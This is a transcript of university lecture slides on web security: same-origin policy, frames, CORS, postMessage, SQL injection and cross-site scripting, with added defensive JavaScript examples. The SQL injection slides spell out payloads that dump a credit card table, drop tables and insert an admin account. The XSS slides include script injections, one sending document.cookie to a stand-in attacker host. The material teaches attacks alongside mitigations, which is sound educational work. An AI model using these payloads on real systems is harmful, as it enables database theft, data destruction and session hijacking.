Slide transcript: PowerPoint Presentation - University of Washington (application-level vulnerabilities: cross-site scripting, cross-site request forgery, SQL injection, etc.)
![Page 1: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/1.jpg)
CSE484/CSE584
BASIC WEB SECURITY MODEL
Dr. Benjamin Livshits
Isolation
Frame and IFRAME
Window may contain frames from different sources
Frame: rigid division as part of a frameset
iFrame: floating inline frame
Why use frames? Delegate screen area to content from another source
Browser provides isolation based on frames
Parent may work even if frame is broken
iFrame example:
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>
Floating IFRAMEs
At Least A Handful of IFRAMEs is Common
Windows Interact
Web vs. OS: An Analogy

| | Operating system | Web browser |
|---|---|---|
| Primitives | System calls, processes, disk | Document object model (DOM), frames, cookies / localStorage |
| Principals | Users | "Origins" |
| Vulnerabilities | Low-level: buffer overflow, other memory issues | Application-level: cross-site scripting, cross-site request forgery, SQL injection, etc. |
Side-by-Side vs. Embedded in a Page
Two independent windows
…or frames
…or browser instances
Interesting interactions
Frame Embedding
Browser Security Mechanism
Each frame of a page has an origin
Origin = <protocol://host:port>
Frame can access its own origin: network access, read/write DOM, storage (cookies)
Frame cannot access data associated with a different origin
(Figure: a page containing frames from origins A and B)
Origin Determination: http://www.example.com
SOP For the DOM
With no additional qualifiers, the term "same-origin policy" most commonly refers to a mechanism that governs the ability for JavaScript and other scripting languages to access DOM properties and methods across domains (reference). In essence, the model boils down to this three-step decision process:
1) If protocol, host name, and port number for two interacting pages match, access is granted with no further checks.
2) Any page may set the document.domain parameter to a right-hand, fully-qualified fragment of its current host name (e.g., foo.bar.example.com may set it to example.com, but not apple.com). If two pages explicitly and mutually set their respective document.domain parameters to the same value, and the remaining same-origin checks are satisfied, access is granted.
3) If neither of the above conditions is satisfied, access is denied.
Domain Relaxation
Origin: <scheme, host, (port), hasSetDomain>
Try document.domain = document.domain
(Figure: www.facebook.com and chat.facebook.com each set document.domain to facebook.com)
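A runnable model of the three-step DOM decision from the previous slide together with the <scheme, host, (port), hasSetDomain> tuple from this one. This is an added example, not code from the slides: originOf, setDocumentDomain and canAccessDom are names chosen here, and step 2 keeps the scheme and port checks because the quoted text says the remaining same-origin checks must still be satisfied.

```javascript
// Added example: a model of the DOM same-origin decision with document.domain
// relaxation. An origin is <scheme, host, port, hasSetDomain>, as on the slide.

// Parse a URL into the origin tuple used by the decision procedure.
function originOf(url) {
  const u = new URL(url);
  const defaultPort = { "http:": "80", "https:": "443" }[u.protocol] || "";
  return {
    scheme: u.protocol,
    host: u.hostname,
    port: u.port || defaultPort,
    effectiveDomain: u.hostname, // value of document.domain before any assignment
    hasSetDomain: false,
  };
}

// Model of `document.domain = value`. Only a right-hand, fully-qualified suffix
// of the current host is accepted (foo.bar.example.com may choose example.com,
// but not apple.com). Real browsers additionally reject public suffixes such
// as "com"; that list is not modelled here. Returns false on rejection.
function setDocumentDomain(page, value) {
  const accepted = value === page.host || page.host.endsWith("." + value);
  if (!accepted) return false;
  page.effectiveDomain = value;
  // The flag is set even when value equals the current host, which is why
  // "document.domain = document.domain" changes a page's effective origin.
  page.hasSetDomain = true;
  return true;
}

// The three-step decision from the slide, between two pages a and b.
function canAccessDom(a, b) {
  // 1) Scheme, host and port match and both pages are in the same domain
  //    state: access granted with no further checks.
  if (a.scheme === b.scheme && a.host === b.host && a.port === b.port &&
      a.hasSetDomain === b.hasSetDomain) {
    return true;
  }
  // 2) Both pages explicitly set document.domain to the same value and the
  //    remaining checks (scheme, port) are satisfied: access granted.
  if (a.hasSetDomain && b.hasSetDomain &&
      a.effectiveDomain === b.effectiveDomain &&
      a.scheme === b.scheme && a.port === b.port) {
    return true;
  }
  // 3) Otherwise access is denied.
  return false;
}
```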
SOP Policy For Cookies: It’s Complicated
https://code.google.com/p/browsersec/wiki/Part2
Script Inclusion Excluded From SOP
www.example.com:
<script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.11.0/jquery.validate.min.js">
</script>
• Script has the privileges of the importing page, NOT of the source server.
• Can script other pages in this origin, load more scripts
• Other forms of importing
Why is this a good idea?
Why is this a bad idea?
SOP: More Details
Same-origin policy for DOM access
Same-origin policy for XMLHttpRequest
Same-origin policy for cookies
Same-origin policy for Flash
Same-origin policy for Java
Same-origin policy for Silverlight
Same-origin policy for Gears
Origin inheritance rules
Remote Scripting and Cross-Domain Access
Additional Mechanisms
Cross-origin network requests
Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Cross-origin client side communication
Client-side messaging via navigation (old browsers)
postMessage (modern browsers)
(Figure: Site A context and Site B context exchanging messages)
Cross-Domain Request
For example, suppose web content on domain http://foo.example.com wishes to invoke content on domain http://bar.other.com
Code of this sort might be used within JavaScript deployed on http://foo.example.com
Cross-Domain GET Request
Firefox headers sent out as part of the request
The resource can be accessed by any domain in a cross-site manner
Pre-Flighting
Allows pre-flighting cross-domain requests to see if they are allowed
Which methods are supported by the domain
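Server-side logic for the two cases in the last slides, a cross-domain GET answered with Access-Control-Allow-Origin and a pre-flight OPTIONS request that asks which methods are supported. This is an added example, not code from the slides; the allow-list, the supported methods and the function names are assumptions, and the origin echoed back is a single value because the header carries one origin or "*", not a list.

```javascript
// Added example: the CORS decision a server (say bar.other.com) makes for a
// request carrying an Origin header. Names and lists below are assumed.
const ALLOWED_ORIGINS = new Set(["http://foo.example.com"]);  // assumed allow-list
const ALLOWED_METHODS = ["GET", "POST"];                       // assumed supported methods
const ALLOWED_HEADERS = ["content-type", "x-requested-with"];  // assumed request headers

// `req` is a constructed object { method, headers } with lower-case header names.
// Returns { status, headers, allowed }: `headers` is the CORS portion of the
// response; `allowed` says whether the browser will let the caller read it.
function corsDecision(req, publicResource = false) {
  const origin = req.headers["origin"];
  const requestedMethod = req.headers["access-control-request-method"];
  const isPreflight = req.method === "OPTIONS" && requestedMethod !== undefined;
  const headers = {};

  if (origin === undefined) {
    // Same-origin request or non-browser client: nothing to add.
    return { status: 200, headers, allowed: true };
  }
  let allowed = false;
  if (publicResource) {
    // "*" means any site may read the resource; browsers never send
    // credentials with it, so it is only right for genuinely public data.
    headers["Access-Control-Allow-Origin"] = "*";
    allowed = true;
  } else if (ALLOWED_ORIGINS.has(origin)) {
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Vary"] = "Origin";   // caches must not reuse this answer for other origins
    allowed = true;
  }
  if (!isPreflight) {
    // Simple request: the server has already executed it; without the header
    // the browser only hides the response from the calling script.
    return { status: 200, headers, allowed };
  }
  // Pre-flight: answer only for allowed origins and supported methods.
  if (!allowed || !ALLOWED_METHODS.includes(requestedMethod.toUpperCase())) {
    return { status: 403, headers: {}, allowed: false };
  }
  headers["Access-Control-Allow-Methods"] = ALLOWED_METHODS.join(", ");
  headers["Access-Control-Allow-Headers"] = ALLOWED_HEADERS.join(", ");
  headers["Access-Control-Max-Age"] = "600";   // seconds the browser may cache this answer
  return { status: 204, headers, allowed: true };
}

// Helper to build constructed requests for the checks below.
function makeRequest(method, origin, extra = {}) {
  const headers = { ...extra };
  if (origin !== undefined) headers["origin"] = origin;
  return { method, headers };
}
```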
Communication
Client-Side window.postMessage API
Client-side communication between principals (domains) that don’t necessarily trust each other
(Figure: "Add a contact" and "Share contacts" frames on one page)
Syntax of postMessage
frames[0].postMessage("Attack at dawn!", "http://b.com/");
window.addEventListener("message", function (e) {
  if (e.origin == "http://a.com") {
    ... e.data ...
  }
}, false);
Why Include “targetOrigin”?
What goes wrong? frames[0].postMessage("Attack at dawn!");
Messages sent to frames, not principals
When would this happen?
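A small model of frames, navigation and postMessage that makes the point above observable: a message is delivered to whatever document currently occupies the frame, so if the frame was navigated elsewhere after a.com obtained its reference, only the targetOrigin check keeps the message from reaching the new occupant. This is an added example, not code from the slides; the Frame class and runScenario are constructed here, and the explicit `sender` argument stands in for the source the real browser API infers from the caller.

```javascript
// Added example: a model of window frames and postMessage, written to show why
// targetOrigin matters. Not a browser API; `sender` is passed explicitly.
class Frame {
  constructor(origin) {
    this.origin = origin;    // origin of the document currently loaded in the frame
    this.listeners = [];     // "message" handlers registered by that document
  }
  // Navigating the frame replaces the document: the old listeners go with it.
  navigate(newOrigin) {
    this.origin = newOrigin;
    this.listeners = [];
  }
  addEventListener(type, handler) {
    if (type === "message") this.listeners.push(handler);
  }
  // Model of frame.postMessage(data, targetOrigin) called from `sender`.
  // "*" means "deliver to whatever is loaded here"; a concrete targetOrigin
  // makes the browser drop the message if the frame now shows another origin.
  postMessage(data, targetOrigin, sender) {
    if (targetOrigin !== "*" && !sameOrigin(targetOrigin, this.origin)) {
      return false;          // silently dropped, as a browser would
    }
    const event = { origin: sender.origin, data };
    for (const handler of this.listeners) handler(event);
    return true;
  }
}

// Compare scheme://host:port only, so "http://b.com/" matches "http://b.com".
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// Scenario from the slide: a sender holds a reference to a frame that showed
// b.com when the reference was taken, and sends "Attack at dawn!".
// navigateTo (optional) simulates the frame being navigated before the send.
function runScenario(targetOrigin, navigateTo, senderOrigin = "http://a.com") {
  const sender = new Frame(senderOrigin);
  const child = new Frame("http://b.com");
  const seenByB = [];
  child.addEventListener("message", (e) => {
    // Receiver-side check from the slide: only act on messages from a.com.
    if (e.origin === "http://a.com") seenByB.push(e.data);
  });
  if (navigateTo) child.navigate(navigateTo);
  const accepted = child.postMessage("Attack at dawn!", targetOrigin, sender);
  return {
    accepted,                                   // did the browser deliver it at all?
    seenByB,                                    // what b.com's handler acted on
    loadedOrigin: child.origin,                 // who actually received it
    leakedToOther: accepted && child.origin !== "http://b.com",
  };
}
```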
Summary
HTTP
Rendering content
Cookies
Isolation
Communication
Navigation
Security User Interface
Frames and frame busting
Source: http://xkcd.com/327/
Break…
Web Application Scenario
(Figure: client sends an HTTP REQUEST to the server; the server returns an HTTP RESPONSE)
Memory Exploits and Web App Vulnerabilities Compared

| Memory exploit | Mitigation | Web app vulnerability | Mitigation |
|---|---|---|---|
| Buffer overruns: stack-based (return-to-libc, etc.), heap-based (heap spraying attacks) | Requires careful programming or memory-safe languages | Cross-site scripting (XSS-0, -1, -2, -3) | Requires careful programming |
| Format string vulnerabilities | Generally, better, more restrictive APIs are enough; simple static tools help | SQL injection | Generally, better, more restrictive APIs are enough; simple static tools help |
SQL Injection Attacks
Attacks a particular site, not (usually) a particular user
Affect applications that use untrusted input as part of an SQL query to a back-end database
Specific case of a more general problem: using untrusted input in commands
SQL Injection: Example
Consider a browser form, e.g. one where the user picks a month:
When the user enters a number and clicks the button, this generates an http request like
https://www.pizza.com/show_orders?month=10
Example Continued…
Upon receiving the request, a Java program might produce an SQL query as follows:
sql_query
  = "SELECT pizza, quantity, order_day "
  + "FROM orders "
  + "WHERE userid=" + session.getCurrentUserId()
  + " AND order_month= "
  + request.getParameter("month");
A normal query would look like:
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=10
Example Continued…
What if the user makes a modified http request: https://www.pizza.com/show_orders?month=0%20OR%201%3D1
(Parameters transferred in URL-encoded form, where meta-characters are encoded in ASCII)
This has the effect of setting request.getParameter("month") equal to the string 0 OR 1=1
Example Continued
So the script generates the following SQL query:
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 OR 1=1
Since AND takes precedence over OR, the above always evaluates to TRUE
The attacker gets every entry in the database!
Even Worse…
Craft an http request that generates an SQL query like the following:
Attacker gets the entire credit card database as well!
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 OR 1=0
UNION SELECT cardholder, number, exp_date
FROM creditcards
More Damage…
SQL queries can encode multiple commands, separated by ‘;’
Craft an http request that generates an SQL query like the following:
Credit card table deleted! DoS attack
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 ;
DROP TABLE creditcards
More Damage…
Craft an http request that generates an SQL query like the following:
User (with chosen password) entered as an administrator!
Database owned!
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 ;
INSERT INTO admin VALUES ('hacker', ...)
May Need to be More Clever…
Consider the following script for text queries:
sql_query
  = "SELECT pizza, quantity, order_day "
  + "FROM orders "
  + "WHERE userid=" + session.getCurrentUserId()
  + " AND topping='"
  + request.getParameter("topping") + "'";
Previous attacks will not work directly, since the commands will be quoted
But easy to deal with this…
Example Continued…
Craft an http request where request.getParameter("topping") is set to abc'; DROP TABLE creditcards; --
The effect is to generate the SQL query:
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND topping='abc';
DROP TABLE creditcards ; --'
('--' represents an SQL comment)
Mitigation? Solutions?
Blacklisting
Whitelisting
Encoding routines
Prepared statements/bind variables
Mitigate the impact of SQL injection
Blacklisting?
I.e., searching for/preventing ‘bad’ inputs
E.g., for previous example:
sql_query
  = "SELECT pizza, quantity, order_day "
  + "FROM orders "
  + "WHERE userid=" + session.getCurrentUserId()
  + " AND topping='"
  + kill_chars(request.getParameter("topping"))
  + "'";
…where kill_chars() deletes, e.g., quotes and semicolons
Drawbacks of Blacklisting
How do you know if/when you’ve eliminated all possible ‘bad’ strings? If you miss one, could allow a successful attack
Does not prevent the first set of attacks (numeric values); although a similar approach could be used, it starts to get complex!
May conflict with functionality of the database, e.g., a user with the name O’Brien
Whitelisting
Check that user-provided input is in some set of values known to be safe
E.g., check that month is an integer in the right range
If invalid input detected, better to reject it than to try to fix it
Fixes may introduce vulnerabilities
Principle of fail-safe defaults
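The blacklisting and whitelisting approaches of the last two slides applied to the slides' own pizza-order query, so that their differences can be checked: kill_chars strips quotes and semicolons but neither stops the numeric "0 OR 1=1" input nor preserves O'Brien, while a whitelist rejects the bad month outright and lets the apostrophe through as data. This is an added example, not code from the slides; the function names (killChars, validateMonth, validateTopping, queryShapeIsIntact, demo) are chosen here, and the query is transcribed from Java to JavaScript.

```javascript
// Added example: blacklist vs. whitelist on the slides' pizza-order query.

// The slides' vulnerable construction: the parameter is pasted into the query
// text, so a crafted value can change the query's structure.
function buildOrdersQueryUnsafe(userId, month) {
  return "SELECT pizza, quantity, order_day FROM orders " +
         "WHERE userid=" + userId + " AND order_month=" + month;
}

// Blacklisting (the slides' kill_chars): delete quotes, semicolons and "--".
function killChars(s) {
  return s.replace(/['";]|--/g, "");
}

// Whitelisting for the numeric field: exactly an integer in 1..12.
// Invalid input is rejected, not repaired (fail-safe default).
function validateMonth(s) {
  if (!/^(0?[1-9]|1[0-2])$/.test(s)) {
    throw new RangeError("month must be an integer in 1..12");
  }
  return Number(s);
}

// Whitelisting for free text: a bounded alphabet and length. The apostrophe is
// allowed because "O'Brien" is legitimate data; a value like this is only safe
// to pass to the database through a bind variable, never by concatenation.
function validateTopping(s) {
  if (!/^[A-Za-z' -]{1,32}$/.test(s)) {
    throw new RangeError("topping contains characters outside the allowed set");
  }
  return s;
}

// Crude structural check used only to make the demonstration observable: the
// intended query has no OR, no second statement, no UNION and no comment.
function queryShapeIsIntact(sql) {
  return !/\bOR\b|;|UNION|--/i.test(sql);
}

// Run one month value through both defences and report what each achieved.
function demo(monthInput) {
  const blacklisted = buildOrdersQueryUnsafe(4123, killChars(monthInput));
  let whitelisted = null;
  let rejected = false;
  try {
    whitelisted = buildOrdersQueryUnsafe(4123, validateMonth(monthInput));
  } catch (e) {
    rejected = true;
  }
  return {
    blacklistIntact: queryShapeIsIntact(blacklisted),
    whitelistRejected: rejected,
    whitelistIntact: whitelisted !== null && queryShapeIsIntact(whitelisted),
  };
}
```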
Prepared Statements/bind Variables
Prepared statements: static queries with bind variables
Variables not involved in query parsing
Bind variables: placeholders guaranteed to be data in correct format
A SQL Injection Example in Java
PreparedStatement ps =
  db.prepareStatement(
    "SELECT pizza, quantity, order_day "
    + "FROM orders WHERE userid=? AND order_month=?");
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2, Integer.parseInt(request.getParameter("month")));
ResultSet res = ps.executeQuery();
The ? placeholders are the bind variables
There’s Even More
Practical SQL Injection: Bit by Bit
Teaches you how to reconstruct entire databases
Overall, SQL injection is easy to fix by banning certain APIs
Prevent queryExecute-type calls with non-constant arguments
Very easy to automate
See a tool like LAPSE that does it for Java
SQL Injection in the Real World
CardSystems was a major credit card processing company
Put out of business by a SQL injection attack
Credit card numbers stored unencrypted
Data on 263,000 accounts stolen
43 million identities exposed
Taxonomy of XSS
XSS-0: client-side
XSS-1: reflective
XSS-2: persistent
What is at the Root of the XSS Problem?
Web Attacker
Controls malicious website (attacker.com)
Can even obtain SSL/TLS certificate for his site
User visits attacker.com – why? Phishing email, enticing content, search results, placed by ad network, blind luck …
Attacker has no other access to user machine!
Cross-site Scripting
If the application is not careful to encode its output data, an attacker can inject script into the output:
out.writeln("<div>");
out.writeln(req.getParameter("name"));
out.writeln("</div>");
name: <script>…; xhr.send(document.cookie);</script>
XSS: Baby Steps
http://example.com/test.php?color=red&background=pink
XSS: Simple Things are Easy
http://example.com/test.php?color=green&background=</style><script>document.write(String.fromCharCode(88,83,83))</script>
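The output-encoding fix for the two cases above: the "name" parameter written into element content is HTML-escaped, while the "color" and "background" parameters of test.php land inside a <style> block, where HTML escaping does not help and only a whitelist of colour values closes the hole. This is an added example, not code from the slides or from test.php; htmlEscape, renderName, validateCssColor and renderStyle are names chosen here.

```javascript
// Added example: encoding for HTML element content, and whitelisting for a
// value that is interpolated into CSS. Both are constructed for this page.

// Encode the characters that can change the meaning of HTML text or of a
// double-quoted attribute value. Safe in those two contexts only, not inside
// <script> or <style>, where the parser does not look for entities.
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// The slide's three writeln calls, as one function: parameter written raw.
function renderNameUnsafe(name) {
  return "<div>" + name + "</div>";
}

// Hardened version: same markup, encoded data.
function renderName(name) {
  return "<div>" + htmlEscape(name) + "</div>";
}

// For the test.php case: accept only a named colour or a hex triplet/sextet,
// anything else is dropped. Returns the value or null.
function validateCssColor(s) {
  return /^(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{1,20})$/i.test(s) ? s : null;
}

// Build the <style> block with validated values, falling back to defaults.
function renderStyle(color, background) {
  const c = validateCssColor(color) || "black";
  const b = validateCssColor(background) || "white";
  return "<style>body { color: " + c + "; background: " + b + "; }</style>";
}

// Detection helper for the checks: is there a <script> start tag in the output
// that the template itself did not put there?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```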
XSSED.org: In Search of XSS
One of the Reports on XSSED
Repro
2006 Example Vulnerability
1) Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website
2) Injected code redirected PayPal visitors to a page warning users their accounts had been compromised
3) Victims were then redirected to a phishing site and prompted to enter sensitive financial data
Source: http://www.acunetix.cz/news/paypal.htm
Consequences of XSS
Cookie theft: most common
http://host/a.php?variable="><script>document.location='http://www.evil.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
But also:
Setting cookies
Injecting code into running application
Injecting a key logger
etc.
XSS Defenses
Simple ones
Compare IP address and cookie
Cookie HttpOnly attribute
There’s much more to be covered later